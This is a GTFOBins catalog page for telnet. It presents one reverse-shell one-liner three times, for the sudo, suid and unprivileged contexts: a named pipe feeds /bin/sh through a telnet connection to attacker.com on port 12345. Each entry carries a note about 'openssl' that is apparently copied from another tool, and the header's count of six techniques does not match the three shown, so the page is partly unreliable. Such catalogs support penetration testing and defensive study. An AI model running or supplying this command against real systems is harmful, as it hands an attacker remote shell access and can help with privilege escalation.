Catalog GTFOBins

GTFO · Tool

telnet

6 techniques Linux · macOSGTFOBins GPL-3.0

reverse-shell

Reverse/Bind ShellPrivilege Escalation LinuxmacOS

The shell process is not spawn by `openssl`.

mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
Context
sudo
Native
reverse-shell

reverse-shell

Reverse/Bind ShellPrivilege Escalation LinuxmacOS

The shell process is not spawn by `openssl`.

mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
Context
suid
Native
reverse-shell

reverse-shell

Reverse/Bind Shell LinuxmacOS

The shell process is not spawn by `openssl`.

mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
Context
unprivileged
Native
reverse-shell